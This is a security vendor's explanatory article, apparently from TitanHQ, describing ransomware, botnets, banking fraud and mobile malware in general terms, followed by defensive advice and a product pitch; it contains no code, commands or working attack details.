logo
TitanHQ

Exposing How Cybercriminals Operate.

How Cybercriminals Steal Money!

Hackers have moved beyond stealing corporate and government secrets and defacing web pages to something more lucrative: stealing actual cash and credit cards, committing fraud, extorting people, and even encrypting data
files and holding it for ransom, until the victim pays a fee to get it back. Over the past three or four years the profile of the cyber attackers has changed. Previously when people used to write worms and viruses, they would typically want    Cybercriminals
to make names for themselves, they were seekers of notoriety. They would release worms and viruses that would cause lots of traffic, crash lots of servers until some patch was deployed, and the game would be over. The big shift that’s occurred over the past three years is a results of significantly increasing volume of commerce that is now transacted on the Internet. As more businesses make more and more money from ecommerce, the cybercriminals want to get their share. The motivation now for the vast majority of cyber attacks is money. The attacker profile has shifted from amateurs to professionals that want to make money and, in many cases, those professionals are very organized. It is their full-time job to attack sites. The bad guys, in some cases, will hire other people as mules to transfer money from one place to the other, so it’s an extensive, organized network. We’re not fighting against amateurs anymore. Let’s explore some of what the cybercriminals are doing and what if anything you can do to protect against that.

Organized Crime Networks

An example of an organized crime network is the Russian Business Network. They’re responsible for botnets like Storm, which have compromised over one million machines. Storm is a peer-to-peer based botnet that can be used for denial of service, key logging and several other malicious actions. The Russian Business Network is also alleged to be responsible for a piece of software called Malware Alarm. Malware Alarm pops up a dialog box on your PC, with a message saying, "We think your computer is infected by malware. Please click here to disinfect." Of course, if you click here to disinfect, it will infect your computer as opposed to disinfect it. The Russian Business Network is a very organized group. The cybercriminals rent out the machines on those botnets for X cents per day, and you give me a binary. I’ll put whatever binary you give me on those machines and farm them out.

Encrypted File Ransom Attacks

A new tactic used by thieves is to encrypt files on a victim’s computer and demand a ransom in order to unlock that. One tool to do that is the Cryptolocker malware. In November, the National Crime Agency in the UK warned that tens of millions of people were targeted by spam containing the Cryptolocker virus. 
 
If you fall victim to Cryptolocker, a hacker could lock up forever that spreadsheet or document where you keep all your contacts, personal data, and root passwords. While this data might have little or no value to the hacker, for you it is vital. So you would certainly considering paying 1 bitcoin (454 Euros), as in the screen shown below, to get that back.

The cyptolocker email contain a zip file. These contain PDF files with a PDF icon whose actual file suffix is .exe. But people will not see that this is an .exe file as show file extensions is turned off in Windows by default. So the victim unzips the file, click on the PDF, and installs the virus. Now Cryptolocker can start encrypting files, plus it goes to the internet and downloads even more malware. The victim cannot unlock the file himself or herself by looking for the encryption key in
the Windows registry or file system. Cryptolocker is far more sophisticated than that. It contacts its command and control server to download encryption keys. It is also fault tolerant. There are not just a handful of command and control servers, something that could be blocked by coordinated law enforcement. Instead the thieves have adopted the P2P approach to distributed computing, which is called Gameover Zeus, as explained
below, making it difficult to shut down.


Gameover Zeus

The Gameover Zeus botnet is a network of 500,000 to 1 million Windows computers that are infected with the Gameover virus which is used to process payments and download encryption keys for Cryptolocker.
Krebs on Security reported in June 2014 that the US Justice Department worked with law enforcement agencies around the world to take control of the Gameover Zeus Botnet. The Gameover Zeus botnet is a network of 500,000 to 1 million Windows
computers that are infected with the Gameover virus which is used to process payments and download encryption keys for Cryptolocker. Krebs says that Gameover has been used to steal more than $100 million from banks, business, and consumers. The accomplices in this crime are ordinary people who unwittingly allowed their computers to be hacked, thus becoming proxies for this crime.

An ordinary hacker can rent a botnet to launch, say, a denial of service attack. Gameover Zeus is orders of magnitude more complex. If its command and control servers get taken down, the system generates random domain names ending in .ru, .com, .info, and .biz and then consults top-level DNS servers to see which new domains have been registered to see if any of those match and then failover to that. In other words, if law enforcement shuts down the existing command and control servers, the thieves can register hundreds more to bring traffic back online. Gameover just looks for any new domain name that matches some pattern and connects to that.


Online Banking Heists

The internet has greatly reduced the need for bank robbers to maintain many people in their crew. The old way of robbing someone’s bank account was to replace an ATM´s card reader with a hacked one and install a camera to read the pin as the banking customer typed that in and then clone their debit card. Someone who is a victim of account theft like that has varying levels of protection depending where they live, whether they have insurance, what kind of account they have,
and how much money was stolen. But consumer protection does not always extend to businesses, where a wire transfer can reach into the hundreds of thousands or millions of dollars. ComputerWorld reported that a judge ruled a bank in the USA could not be held responsible for $440,000 that was stolen from a business account. The bank was following recommended security practices. The customer lost their user id and password to hackers who used that to wire money to themselves. That court said the customer’s inability to protect their own password was not the bank’s fault. Protection does not always extend to businesses, where a wire transfer can reach into the hundreds of thousands or millions of dollars. 
Sometimes banks are the victims themselves. Last year hackers logged into systems of various banks in the Middle East and greatly increased the value of prepaid Mastercards issued there. Then thieves fanned on foot to buy luxury cars
and Rolex watches.
 

Keyboard Logging

The thieves who robbed the commercial customer we mentioned above could have stolen these credentials by installing malware that records keystrokes. Windows is not the only place where that happens. Security researchers have shown that Android
(and iPhone) apps can use the accelerometer, gyroscope, and orientation sensors to determine what the key user has typed on the keyboard.

People rarely pay any attention to the permission requested by Android apps when they install them. Plus apps ask for permissions they do not need. For example, why does Chrome need access to your camera and Microsoft SkyDrive need access to your contacts? What makes this situation worse is there is no option to give permissions one-at-a-time. Either you install the app with all the permissions requested or you cannot install the app. So people are trained to give all of that away without giving it much thought.

Fraud

There are many kinds of smartphone attacks. For example, people can install malware that looks like something they already know, like Angry Birds, that uses the same logo. Then the user blows through the permissions screen, without reading that carefully, and gives away access to their phone logs, contacts, camera and microphone, sensors, and the ability to send text messages. Once installed, the app can send out text messages to expensive messaging services running up the customer’s bill and filling the criminal’s coffers.WhatsApp has become a platform for executing fraud. People have been tricked into forwarding messages to others. When someone clicks on that message, it directs them to a website

People rarely pay any attention to the permission requested by Android apps when they install them. Plus apps ask for permissions they do not need which then records their IP address. With the IP address, the hacker can consult
the phonebook and map to create a voice mail from that country code and area code or invoice from a company located in that area. Someone is more likely to trust something from someone who works or lives in the same area as opposed to, say, some distant location. Once the victim opens the link, the site can drop an .apk (zipped-up Android app) file into the download folder. Depending on the operating system version and the security settings on the phone, if the user clicks on that it either
installs the app, warns the user about that, or not install anything. Then the app can start stealing data and sending out copies of itself.

Wholesale Data Theft

It was widely reported last year that hackers got into the point-of-sale cash register systems at the American retailer Target. They stole 250 million credit cards. This type of data, like credit card numbers and identity information is very attractive for cybercriminals. Within hours those stolen credit cards were being sold in online black markets for $100 each. Online black markets are an ever expanding channels and growing underground economy. Criminals can also burn those credit
card numbers onto blank magnetic stripes of their own and hand those out to mules who then go to ATMs and try to do cash advances or use the cards at various points of sale. The American banking system is particularly vulnerable to that because they do not required pins or use a credit card authentication keys. Because of this weakness and data loss, the Americans are starting to change those payment systems.

This year there were more victims. Hackers stole an incredible 350 million user ids and passwords from eBay. eBay owns PayPal as well, but the passwords for each system are kept in separate databases. Thank goodness for that, as
PayPal is where the money is located. But as you know, people often use the same password for more than one system. Try their eBay password at PayPal and it might just work. Passwords should be at least 8 characters, use letters that are not words, be mixed case and include numbers
and symbols.

Stolen passwords are not safe. They are not encrypted, as that would require that they be accompanied by a key (in other words a password), instead they are encoded. That means they can be unlocked by simply looking in a dictionary of hashed passwords to see which ones match. For this reason, people should not use words in English, Russian, or any other languages as passwords. You’ve undoubtedly heard this before, but are you doing it? All network devices should be configured
with strong passwords. Passwords should be at least 8 characters, use letters that are not words, be mixed case and include numbers and symbols.

Security Weaknesses in Windows

The problems with the 8080 architecture and Windows are almost too numerous to list. Here are just a few and what, if anything has been done to address that.

One process should not be able to read the memory of another process. That is an Intel issue. 

  • Microsoft now requires that .dlls be signed in order to run in the OS. That is an improvement as hackers now have to write their viruses to run inside other running processes, since they execute .dlls themselves. Of course, installing an .exe is another issue, as the user who does that has given express permission to the operating system.
  • The buffer overflow problem is associated with the ability to read another program’s memory. Java and Android do not have this problem as programs there run inside Java virtual machines (The modified version of Java that powers Android is called Dalvik.). Those cannot read memory outside the virtual machine. A C++ program running on windows can read memory outside the area it has declared as its own. Hackers use this to insert assembly language instructions in programs to make them load other objects in memory. That is how they gain command-line access to Windows. Microsoft has randomizes where items are stored in memory to make that more difficult.
  • Windows gives almost anyone access to low-level operations and system files. So a person can modify routing tables, overwrite system files, and do what otherwise would be limited in Mac OS or other operating systems.

With the level of threats growing, what can you do? The short answer is: it’s complicated.The best security is to assume that your computers are already infected.

Two Factor Authentication

The number one way to stop hackers is to require two-factor authentication everywhere. That is such a simple idea that it stymies the mind to understand why people do not use their cell phone or other device to authenticate their email or PC. If a hacker plants malware on your computer to read your keystrokes, they cannot use those stolen credentials to login without the Google Authenticator, RSA token, Cryptocard, or biometric device used to enter the token needed to login to that.

These solutions don’t solve the problem of phishing, spoofing or on line impersonation but they all make it a lot more difficult for criminals to succeed. Getting people to use two-factor authentication is a matter of education on the importance of doing so. The technology is available, most banks and brokerages, and social media offer it. These solutions don’t solve the problem of phishing, spoofing or on line impersonation but they all make it a lot more difficult for criminals to succeed and will protect your online accounts.

 
Internet and Computer Usage Policy

The biggest wild card in computer security is the end user. A good corporate usage policy is an obvious starting point, however many companies don’t bother or realise the importance. A usage policy is now a serious requirement for businesses. Importantly, not all internet policies should be the same: each should be tailored to the organisation’s particular requirements so that clear, realistic and company appropriate guidelines are in place. As well as the issue of time wasting on the internet, the risk of employees accessing infected sites of spreading malware, viruses and botnet infections across the network is widespread. Cybercriminals wanting access to company network and data are not interested in the size of the company so all sizes are at risk however, being prepared is the best defence to tackle these problems.

Training and Education

Probably the best way to prevent attacks is through education. As we said earlier, botnets are computers operated by ordinary people set loose on your computers and others. People already know you should not play with matches; they should also be
taught to pay attention what they click.

Don’t be a Vector

If you are running a website or application then deploy tools to prevent cross-site scripting and SQL injection. Those are attacks where people enter actual mini-computer programs into data fields causing the computer to process that as instructions to unmask cookies from other user sessions, copy files, or otherwise do damage.

Security Solutions

Spam is a big headache for organisations, causing problems such as data loss, network slowdown, lost employee time and delivery of offensive, fraudulent and dangerous content to users. Spammers are constantly deploying new techniques to get around spam and security filters. Selecting a business spam filter can alleviate spam as a problem for businesses. There are many different types of business spam filter available. There are a wide range of business spam filtering solutions available. Choosing the right solution for your organisation will depend on many factors including the number of e-mail accounts you want to support, your network topology, how much you are willing to spend, how you would like to deploy the solution, how easily you can migrate to an alternative solution. Once you’ve established your key requirements it’s then time to research and look at the options available.

It’s important to keep your anti-spam, anti-virus and other network security solutions up to date. Most solutions will prompt you to do this and any many will automatically update, it’s important that you manually check for these updates regularly. Oftentimes the updates will be related to new features you don’t care about, but updates will often deliver critical patches behind the scenes also.

Conclusion

After outlining the risks and how to mitigate some of those, it’s important to note that the situation is only going to get worse as refrigerators, thermostats, televisions, and even automobiles are all now connected or will be connected to the internet. Expect that cybercrime will increase and educate yourself about that. Even the most secure computers in the world, the US Military and those at the NSA, were defeated by simple thumb drives. So your organization and you are certainly going to be a target at some point. The important thing to do is plan for that.

If you enjoyed this article you might also be interested in our System Administrators toolbox which contains lots of useful resources for busy IT Pros.


 

Get Your 30 Day FREE Trial
TitanHQ

Talk to Our Email and DNS Security Team

Call us on USA +1 813 304 2544 or IRL +353 91 545555

Contact Us